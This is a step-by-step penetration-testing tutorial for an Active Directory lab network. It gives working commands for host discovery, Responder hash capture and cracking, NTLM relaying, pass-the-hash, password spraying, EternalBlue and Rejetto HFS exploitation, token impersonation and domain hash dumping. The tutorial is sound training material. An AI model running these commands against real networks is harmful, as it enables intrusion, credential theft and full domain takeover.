< Back to All

Introduction to Active Directory exploitation.

Get started in the HackerLab with our introductory guide to exploiting an Active Directory environment.

The guide below is based on our own internal network which we provide at all of our meetups.

Recon:

Host identification:

Firstly connect to your network and check your local IP

# ifconfig
# ifconfig | Pentesting active directory guide: 2020

Once you have your IP perform a host discovery scan to find live hosts and add them to your targets list

# nmap -n -sn 192.168.101.0/24 | grep for | cut -d " " -f 5 |tee -a targets.txt
# nmap | Pentesting active directory guide: 2020

Remove your IP from the targets file (192.168.101.1)

Now scan the targets with nmap in a for loop as we can use grep to sort our output into a useful list

# mkdir nmap
# for i in $(cat targets.txt); do nmap -p- $i -sSVC -oN nmap/$i; done

Once the scan has finished cd into the nmap folder and run the following command to get a useful list of hosts and ports that are open:

# cd nmap/
# grep -Hari “/tcp” | grep -v SF | tee -a ../servicelist.txt
# cd nmap | Pentesting active directory guide: 2020

Identify the Domain Controllers

Scan for Kerberos and LDAP which should help you identify the domain controllers

# nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt

Check your nmap results for the domain name

NBTScan

Use nbtscan to identify the hostnames

Responder

In a new tab start responder on the correct network interface:

# responder -I vboxnet0
# responder | Pentesting active directory guide: 2020

After a short period of time you may see some hashes

Let this run for around 10 minutes. Longer if performing an actual engagement.

Stop responder at this point.

Now add your found hashes to a file for cracking with the command.

# cat /usr/share/responder/logs/SMB* | tee -a responderhashes.txt

Now attempt to crack these hashes with hashcat.

# hashcat -m 5600 --force responderhashes.txt /usr/share/wordlists/rockyou.txt
# hashcat | Pentesting active directory guide: 2020

Now we have passwords for various users we can start enumerating the Active Directory domain.

NTLM Relaying

Another SMB based attack which allows you to download the local administrator hashes.

Modify the /etc/responder/Responder.conf file and turn off SMB and HTTP:

Find all hosts with SMBSigning disabled with the following nmap command.

# nmap -n -p 137,139,445 --script=smb-security-mode 192.168.101.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt

Start responder on the correct interface.

# responder -I vboxnet0 -r -d -w

Now start impacket-ntlmrelayx against the target hosts

impacket-ntlmrelayx -tf smbsigningdisabled.txt

Wait for a short period of time for an administrative hash to be relayed against the hosts and it will dump the local hashes of the system which you can use with psexec to login to the system.

Once you have captured enough hashes attempt to use them to login to other systems.

Captured hashes | Pentesting active directory guide: 2020

They are stored in a local file in your current working dir. Use the following commad to login to a machine using a pass the hash technique

# pth-winexe -U thehackerlab\\administrator%aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e //192.168.101.4 cmd.exe
# pth-winexe | Pentesting active directory guide: 2020

RPCClient and Password ‘Spraying’

Get a list of domain users from the domain controller we found earlier using Lillians credentials

# rpcclient -U "thehackerlab\\LILLIAN%noyego" 192.168.101.4 -c enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 | tee -a domainusers.txt

Open msfconsole and set the following parameters

# msfconsole -q
# use auxiliary/scanner/smb/smb_login
# set rhosts 192.168.101.4
# set SMBDomain thehackerlab
# set USER_FILE domainusers.txt
# set SMBPass password
# run

This will recover any weak passwords, other passwords worth trying include Clientname2020 and things like Summer2019 etc

You can now use these credentials to login to different machines using psexec.

# msfconsole -q
# use exploit/windows/smb/psexec
# set rhosts 192.168.101.4
# set SMBDomain thehackerlab
# set SMBUser Noah
# set SMBPass password
# run

SMBmap

Check for open smb shares without credentials

# smbmap --host-file targets.txt

Now check with credentials.

# smbmap --host-file targets.txt -u LILLIAN -p noyego -d thehackerlab

Exploitation

Vulnerability scanning

Start msfconsole and use the scanner/smb/smb_ms17_010 module to search for eternal blue:

# use auxiliary/scanner/smb/smb_ms17_010
# set rhosts 192.168.101.0/24
# run

Once you have identified some vulnerable hosts attempt to exploit them with the windows/smb/ms17_010_eternalblue module (Windows 7 targets are a good option if vulnerable)

# use exploit/windows/smb/ms17_010_eternalblue
# set rhost 192.168.101.5
# set lhost 192.168.101.1
# run

If your shell is successful then you will have a local system shell on the machine as follows:

Searching for vulnerable services

From our nmap scans we can see an interesting service with a version:

Check for known exploits with searchsploit.

# searchsploit http file server

There is a metasploit module which may be useful.

Load metasploit and set our configuration as follows:

# search rejetto
# use exploit/windows/http/rejetto_hfs_exec
# set rhost 192.168.101.3
# set lhost 192.168.101.1
# show options
# run

Escalating privileges and token impersonation

Using our new session opened on the domain controller we will check the tokens available on the machine.

Once we load incognito we can see that there is an administrators token which we may be able to impersonate to elevate our privileges to “Domain Administrator”.

# getuid
# getsystem
# load incognito
# list_tokens -u

Impersonating the token we can see we now have the rights of a domain administrator once we drop into a shell:

# impersonate_token thehackerlab\\administrator
# getuid
# shell

Now we are a domain administrator we have full control over the domain.

Dumping domain hashes

Background your meterpreter session:

# background
# use post/windows/gather/smart_hashdump
# sessions
# set session 2
# run

This will give you the hashes from the domain controller:

Now you can attempt to crack them with hashcat or john.

# john --format=NT /root/.msf4/loot/20200124102608_default_192.168.101.4_windows.hashes_075130.txt --wordlist=/usr/share/wordlists/rockyou.txt